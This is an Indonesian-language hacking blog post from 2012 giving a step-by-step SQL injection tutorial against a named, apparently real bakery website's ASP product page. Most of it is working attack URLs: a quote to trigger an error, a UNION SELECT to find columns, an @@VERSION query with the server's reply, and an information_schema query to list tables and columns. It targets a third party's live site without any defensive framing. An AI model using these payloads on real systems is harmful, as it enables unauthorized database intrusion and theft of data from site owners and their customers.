Rabu, 29 Agustus 2012
Home » Exploit » Hacking » Tutorial » SQL Injection ASP
16.34
0 komentar

SQL Injection ASP

Demo Site :
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33
Tambahi Syntak apa kek misal ' / =
Having Error
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/Product_Des.asp, line 11

Lanjut Ke Tahap Kedua
Code:
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,2,3,4--
angka Togelna 3 kan
Kita Cek Versinya Dolo angka Togel /visible Colom dirubah
Code:
http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright � 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)


Oke Tahap Ketiga
Schema Database :))
Code:
http://www?astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--


Diposting oleh di 16.34
Label: , ,
Share:

0 komentar:

Posting Komentar

Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !

Langganan: Posting Komentar (Atom)